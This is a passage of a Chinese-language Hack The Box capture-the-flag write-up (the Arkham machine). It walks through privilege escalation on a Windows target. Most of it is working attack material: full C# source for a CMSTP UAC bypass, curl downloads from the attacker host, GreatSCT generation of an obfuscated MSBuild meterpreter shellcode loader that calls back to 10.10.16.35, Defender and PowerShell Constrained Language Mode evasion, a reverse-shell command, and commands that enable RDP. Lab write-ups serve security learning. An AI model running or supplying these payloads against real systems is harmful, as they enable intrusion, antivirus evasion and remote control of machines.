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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAA0D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")) | Out-Null
}
[CMSTPBypass]::Execute($Command)
}準備好檔案後,丟上去
curl 10.10.16.35/CMSTP-UAC-Bypass.ps1 -o CMSTP-UAC-Bypass.ps1跑起來!!!
PS C:\Users\Batman> .\CMSTP-UAC-Bypass.ps1
.\CMSTP-UAC-Bypass.ps1 : Operation did not complete successfully because the file contains a virus or potentially unwanted software.
At line:1 char:1
+ .\CMSTP-UAC-Bypass.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException幹 …!?!??!
所以說 …… 他 Defender 把我的東東給抓走了 QQ
那接著我們可以試著自己 Compile 檔案,通常自己 Compile 的東西,Defender 不會抓
/*
UAC Bypass using CMSTP.exe microsoft binary
Based on previous work from Oddvar Moe
Research on CMSTP.exe
And this PowerShell script of Tyler Applebaum
https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
Code author: Andre Marques (@_zc00l)
*/
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Windows;
using System.Runtime.InteropServices;
public class CMSTPBypass
{
// Our .INF file data!
public static string InfData = @"[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
REPLACE_COMMAND_LINE
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"
[Strings]
ServiceName=""CorpVPN""
ShortSvcName=""CorpVPN""
";
[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
[DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);
public static string BinaryPath = "c:\\windows\\system32\\cmstp.exe";
/* Generates a random named .inf file with command to be executed with UAC privileges */
public static string SetInfFile(string CommandToExecute)
{
string RandomFileName = Path.GetRandomFileName().Split(Convert.ToChar("."))[0];
string TemporaryDir = "C:\\windows\\temp";
StringBuilder OutputFile = new StringBuilder();
OutputFile.Append(TemporaryDir);
OutputFile.Append("\\");
OutputFile.Append(RandomFileName);
OutputFile.Append(".inf");
StringBuilder newInfData = new StringBuilder(InfData);
newInfData.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
File.WriteAllText(OutputFile.ToString(), newInfData.ToString());
return OutputFile.ToString();
}
public static bool Execute(string CommandToExecute)
{
if(!File.Exists(BinaryPath))
{
Console.WriteLine("Could not find cmstp.exe binary!");
return false;
}
StringBuilder InfFile = new StringBuilder();
InfFile.Append(SetInfFile(CommandToExecute));
Console.WriteLine("Payload file written to " + InfFile.ToString());
ProcessStartInfo startInfo = new ProcessStartInfo(BinaryPath);
startInfo.Arguments = "/au " + InfFile.ToString();
startInfo.UseShellExecute = false;
Process.Start(startInfo);
IntPtr windowHandle = new IntPtr();
windowHandle = IntPtr.Zero;
do {
windowHandle = SetWindowActive("cmstp");
} while (windowHandle == IntPtr.Zero);
System.Windows.Forms.SendKeys.SendWait("{ENTER}");
return true;
}
public static IntPtr SetWindowActive(string ProcessName)
{
Process[] target = Process.GetProcessesByName(ProcessName);
if(target.Length == 0) return IntPtr.Zero;
target[0].Refresh();
IntPtr WindowHandle = new IntPtr();
WindowHandle = target[0].MainWindowHandle;
if(WindowHandle == IntPtr.Zero) return IntPtr.Zero;
SetForegroundWindow(WindowHandle);
ShowWindow(WindowHandle, 5);
return WindowHandle;
}
}一樣先把檔案丟上去
curl 10.10.16.35/cmstd-uac-bypass.cs -o cmstd-uac-bypass.cs跑 Compile
PS C:\Users\Batman> Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "UAC-Bypass.dll"
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:1 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) - ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage看起來是電腦不支援 …
通常出現下面這段文字,代表電腦處於 ConstrainedLanguage 約束語言模式
Cannot invoke method. Method invocation is supported only on core types in this language mode.ref:
https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/
想要確認的方法是,可以在 Powershell 中輸入
$ExecutionContext.SessionState.LanguageMode如果回傳 ConstrainedLanguage 代表被限制,而 FullLanguage 則代表沒有被限制
這個模式被稱作 Constrained Language Mode,CLM,可以透過下列網址的各種方法來 Bypass CLM
https://www.anquanke.com/post/id/160948
但上述的方式都偏複雜,所以我想用 meterpreter 的方法來解,在 meterpreter 中,只要使用
load powershell
powershell_shell就可以簡單的 Bypass CLM
https://fireantlabs.com/post/2021/05/powershell-constrained-mode-bypass-with-meterpreter/
GreatSCT Run Meterpreter
因為他不能傳 Meterpreter ,會被 Defender 偵測為病毒,所以我們要來搞免殺,並透過 meterpreter 的方法來 Bypass CLM
這邊我使用的方法是 GreatSCT ,他有許多的 Extenstion 有辦法辦到 Bypass Defender 等防毒的功能
不過 GreatSCT 要用 x86 Kali Linux 跑,我在 ARM Kali 或是 lima 的 x86 Ubuntu 上都怪怪的
首先先進行安裝
git clone https://github.com/GreatSCT/GreatSCT
cd GreatSCT
cd setup
sudo ./setup.sh -c接下來執行程式
┌──(kali㉿kali)-[~/GreatSCT]
└─$ python3 GreatSCT.py
===============================================================================
GreatSCT | [Version]: 1.0
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
Main Menu
1 tools loaded
Available Commands:
exit Exit GreatSCT
info Information on a specific tool
list List available tools
update Update GreatSCT
use Use a specific tool
Main menu choice: list首先輸入 List 觀察他有哪些 tools
===============================================================================
GreatSCT | [Version]: 1.0
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
[*] Available Tools:
1) Bypass發現只有 Bypass (那問屁問 = =?)
再來使用 Bypass 的 Module
===============================================================================
GreatSCT | [Version]: 1.0
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
Main Menu
1 tools loaded
Available Commands:
exit Exit GreatSCT
info Information on a specific tool
list List available tools
update Update GreatSCT
use Use a specific tool
Main menu choice: use Bypass再來觀察 Bypass 的 Module 裡面有哪些 payload,輸入 list
===============================================================================
Great Scott!
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
GreatSCT-Bypass Menu
26 payloads loaded
Available Commands:
back Go to main GreatSCT menu
checkvt Check virustotal against generated hashes
clean Remove generated artifacts
exit Exit GreatSCT
info Information on a specific payload
list List available payloads
use Use a specific payload
GreatSCT-Bypass command: list他就會噴出目前支援的 26 個 Module 了,這邊我選用 9 號,也就是最普通的 meterperter reverse tcp
===============================================================================
Great Scott!
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
[*] Available Payloads:
1) installutil/meterpreter/rev_http.py
2) installutil/meterpreter/rev_https.py
3) installutil/meterpreter/rev_tcp.py
4) installutil/powershell/script.py
5) installutil/shellcode_inject/base64.py
6) installutil/shellcode_inject/virtual.py
7) msbuild/meterpreter/rev_http.py
8) msbuild/meterpreter/rev_https.py
9) msbuild/meterpreter/rev_tcp.py
10) msbuild/powershell/script.py
11) msbuild/shellcode_inject/base64.py
12) msbuild/shellcode_inject/virtual.py
13) mshta/shellcode_inject/base64_migrate.py
14) regasm/meterpreter/rev_http.py
15) regasm/meterpreter/rev_https.py
16) regasm/meterpreter/rev_tcp.py
17) regasm/powershell/script.py
18) regasm/shellcode_inject/base64.py
19) regasm/shellcode_inject/virtual.py
20) regsvcs/meterpreter/rev_http.py
21) regsvcs/meterpreter/rev_https.py
22) regsvcs/meterpreter/rev_tcp.py
23) regsvcs/powershell/script.py
24) regsvcs/shellcode_inject/base64.py
25) regsvcs/shellcode_inject/virtual.py
26) regsvr32/shellcode_inject/base64_migrate.py
GreatSCT-Bypass command: use 9接下來得介面其實就跟 metasploit 差不了太多,照著選,最後 generate 就好ㄌ
Payload: msbuild/meterpreter/rev_tcp selected
Required Options:
Name Value Description
---- ----- -----------
DOMAIN X Optional: Required internal domain
EXPIRE_PAYLOAD X Optional: Payloads expire after "Y" days
HOSTNAME X Optional: Required system hostname
INJECT_METHOD Virtual Virtual or Heap
LHOST IP of the Metasploit handler
LPORT 4444 Port of the Metasploit handler
PROCESSORS X Optional: Minimum number of processors
SLEEP X Optional: Sleep "Y" seconds, check if accelerated
TIMEZONE X Optional: Check to validate not in UTC
USERNAME X Optional: The required user account
Available Commands:
back Go back
exit Completely exit GreatSCT
generate Generate the payload
options Show the shellcode's options
set Set shellcode option
[msbuild/meterpreter/rev_tcp>>] set LHOST 10.10.16.35
[msbuild/meterpreter/rev_tcp>>] set LPORT 6666
[msbuild/meterpreter/rev_tcp>>] generateGenerate 後,會跳出下面的畫面,算是一個 Summary
===============================================================================
Great Scott!
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
[*] Language: msbuild
[*] Payload Module: msbuild/meterpreter/rev_tcp
[*] MSBuild compiles for us, so you just get xml :)
[*] Source code written to: /usr/share/greatsct-output/source/payload.xml
[*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/payload.rc
Please press enter to continue >:我們需要關注的檔案就只是 Source Code 以及 Metasploit RC file
首先我們可以先觀察一下 msf 的 RC File
┌──(kali㉿kali)-[~/GreatSCT]
└─$ cat /usr/share/greatsct-output/handlers/payload.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.16.35
set LPORT 6666
set ExitOnSession false
exploit -j其實沒什麼,就是教我們 msf 要怎麼下指令
而重點應該會是 xml 的那個檔案
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<Target Name="OykJZTe">
<BuLleWfylAfeG />
</Target>
<UsingTask
TaskName="BuLleWfylAfeG"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
public class BuLleWfylAfeG : Task, ITask {
[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 BooIpvbrTLpAPJ,UInt32 nftAUYGTkB, UInt32 MszHGZVMZliV, UInt32 orVihvCX);
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 wDxDgMgbYNTV, UInt32 uoIizPKVCazxeu, UInt32 FXHAAJ,IntPtr eUMskIrxGZD, UInt32 KmNRgeeg, ref UInt32 PqHToYdBhiWRHEl);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr gvfxFJynDBsBnY, UInt32 AjvsYtKuJ);
static byte[] ChqHxZq(string SpSZjZPF, int eWNnvtunlI) {
IPEndPoint HQknXtYDWa = new IPEndPoint(IPAddress.Parse(SpSZjZPF), eWNnvtunlI);
Socket KeyCJPEpr = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
try { KeyCJPEpr.Connect(HQknXtYDWa); }
catch { return null;}
byte[] zXirgBvRttzo = new byte[4];
KeyCJPEpr.Receive(zXirgBvRttzo, 4, 0);
int wtxLPgNo = BitConverter.ToInt32(zXirgBvRttzo, 0);
byte[] VclYlXHBcCDYhCw = new byte[wtxLPgNo + 5];
int DBxmEzRFtLpWp = 0;
while (DBxmEzRFtLpWp < wtxLPgNo)
{ DBxmEzRFtLpWp += KeyCJPEpr.Receive(VclYlXHBcCDYhCw, DBxmEzRFtLpWp + 5, (wtxLPgNo - DBxmEzRFtLpWp) < 4096 ? (wtxLPgNo - DBxmEzRFtLpWp) : 4096, 0);}
byte[] vLdLPIBJtqAtsMH = BitConverter.GetBytes((int)KeyCJPEpr.Handle);
Array.Copy(vLdLPIBJtqAtsMH, 0, VclYlXHBcCDYhCw, 1, 4); VclYlXHBcCDYhCw[0] = 0xBF;
return VclYlXHBcCDYhCw;}
static void vDjaXaReyNNGd(byte[] lRJGfCGwVlfD) {
if (lRJGfCGwVlfD != null) {
UInt32 sEbdib = VirtualAlloc(0, (UInt32)lRJGfCGwVlfD.Length, 0x1000, 0x40);
Marshal.Copy(lRJGfCGwVlfD, 0, (IntPtr)(sEbdib), lRJGfCGwVlfD.Length);
IntPtr yABFbdL = IntPtr.Zero;
UInt32 pOpMwdFJ = 0;
IntPtr aHbDCcFy = IntPtr.Zero;
yABFbdL = CreateThread(0, 0, sEbdib, aHbDCcFy, 0, ref pOpMwdFJ);
WaitForSingleObject(yABFbdL, 0xFFFFFFFF); }}
public override bool Execute()
{
byte[] CKcXRbrfQcbkg = null; CKcXRbrfQcbkg = ChqHxZq("10.10.16.35", 6666);
vDjaXaReyNNGd(CKcXRbrfQcbkg);
return true; } }
]]>
</Code>
</Task>
</UsingTask>
</Project>大概的看一下,可以知道這是一個 XML 檔案,可以讓 msbuild 在 build 的過程中去執行下面這些東東,而 Windows Defender 有一個特性是,自己 Compile 的東西自己不會抓,所以我們要利用這個特性來 Bypass Defender
首先先把 xml 檔案丟上去
curl 10.10.16.35/r.xml -o r.xml接下來把 msf 開好待命
並且執行下面指令
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\Batman\r.xml會觀察 Build 到一半卡住
而這個時候,我們就收到 meterpreter 的 Session 了
Meterperter Bypass CLM
首先先 migrate 自己的 PID
下 ps 找到 explorer.exe
meterpreter > migrate 4956
[*] Migrating from 1516 to 4956...
[*] Migration completed successfully.再來 run 下面的指令
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > $executioncontext.sessionstate.languagemode
FullLanguage我們用 meterpreter 自己 spawn 出來的 Powershell ,就能 Bypass CLM
再來回到前面的 CMSTP-UAC-Bypass 的 Part,我們先準備好 Source.cs 檔案,執行下面兩行來 Compile DLL
Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"
[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))最後再打一次 Shell 回來
[CMSTPBypass]::Execute("C:\Users\Batman\tshd_windows_amd64.exe -c 10.10.16.35 -p 6665")幹!終於結束了 Q__Q
再來就可以暢行無阻的去拿 Flag 了
Beyond System
雖然結束了,但還是想知道自己前面踩的雷到底是為什麼,所以我就先幫他開個 RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes發現他真的 Defender 全開 …..
所以先前的 UAC Bypass 就被抓ㄌ
先前打的 certutil 也被抓 QAQ
另外,我們也可以直接去 C:\tomcat\apache-tomcat-8.5.37\webapps 把原始檔案抓回家看一下
在 ROOT/userSubscribe.jsp 可以看到塞入 Viewstate 的點
<f:view >
<h:form>
<h:panelGrid>
<h:inputText style="margin-left:50px;" styleClass="button" id="email" value="#{helloWorldJSFManagedBean.userFormView.userName}"></h:inputText>
</h:panelGrid>
<h:commandButton type="submit" style="cursor: pointer" styleClass="button" id="submit" action="welcomePage" value="SIGN UP"></h:commandButton>
</h:form>
</f:view>而 WEB-INF/web.xml 跟我們先前從 smb 得到的檔案一致
<param-name>org.apache.myfaces.SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
<param-value>HmacSHA1</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.MAC_SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>而 WEB-INF/classes/jsfHelloWorldBean/HelloWorldJSFManagedBean.class
可以用 JD-GUI 拆開來看,裡面也沒啥東西,但可以注意到他有 implements Serializable
public class HelloWorldJSFManagedBean implements Serializable {
private static final long serialVersionUID = 1L;
private UserFormView userFormView = new UserFormView();
public UserFormView getUserFormView() {
return this.userFormView;
}
public void setUserFormView(UserFormView userFormView) {
this.userFormView = userFormView;
}
public String showUserDetails() {
System.out.println("The Name Of the user is :" + this.userFormView.getUserName());
return "welcomePage";
}
}Java 的反序列化 function 叫做 readObject,而我們知道這個反序列化漏洞在 myfaces 裡面,所以可以直接跟進去找一下 myfaces-impl-1.2.9.jar 裡面的 JspStateManagerlmpl.class 第 752 行
總之,程式會在這個 function 中,把 View State 的東西執行反序列化,達成攻擊的效果
protected Object deserializeView(Object state)
{
if (log.isTraceEnabled()) log.trace("Entering deserializeView");
if(state instanceof byte[])
{
if (log.isTraceEnabled()) log.trace("Processing deserializeView - deserializing serialized state. Bytes : "+((byte[]) state).length);
try
{
ByteArrayInputStream bais = new ByteArrayInputStream((byte[]) state);
InputStream is = bais;
if(is.read() == COMPRESSED_FLAG)
{
is = new GZIPInputStream(is);
}
ObjectInputStream ois = null;
try
{
final ObjectInputStream in = new MyFacesObjectInputStream(is);
ois = in;
Object object = null;
if (System.getSecurityManager() != null)
{
object = AccessController.doPrivileged(new PrivilegedExceptionAction<Object []>()
{
public Object[] run() throws PrivilegedActionException, IOException, ClassNotFoundException
{
return new Object[] {in.readObject(), in.readObject()};
}
});
}
else
{
object = new Object[] {in.readObject(), in.readObject()};
}
return object;
}我們也可以在 StateUtils.class 中找到加密相關的資訊
public final class StateUtils {
private static final Log log = LogFactory.getLog(StateUtils.class);
public static final String ZIP_CHARSET = "ISO-8859-1";
public static final String DEFAULT_ALGORITHM = "DES";
public static final String DEFAULT_ALGORITHM_PARAMS = "ECB/PKCS5Padding";
public static final String INIT_PREFIX = "org.apache.myfaces.";這題就差不多這樣ㄅ,好累 QQ
Ref
- https://blog.kaibro.tw/2020/02/23/Java反序列化之readObject分析/
- https://www.cnblogs.com/backlion/p/10493919.html
- https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/
- https://issues.apache.org/jira/browse/MYFACES-4133
- https://book.hacktricks.xyz/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization
- https://www.exploit-db.com/docs/48126
- https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHEMYFACESCORE-30680
- https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html
- https://www.cnblogs.com/backlion/p/10493919.html
- https://0xrick.github.io/hack-the-box/arkham/
- https://0xdf.gitlab.io/2019/08/10/htb-arkham.html
- https://hipotermia.pw/htb/arkham
- https://github.com/GreatSCT/GreatSCT
- https://github.com/padovah4ck/PSByPassCLM
- https://darkwing.moe/2021/04/25/Arkham-HackTheBox/
- https://en.wikipedia.org/wiki/Jakarta_Server_Faces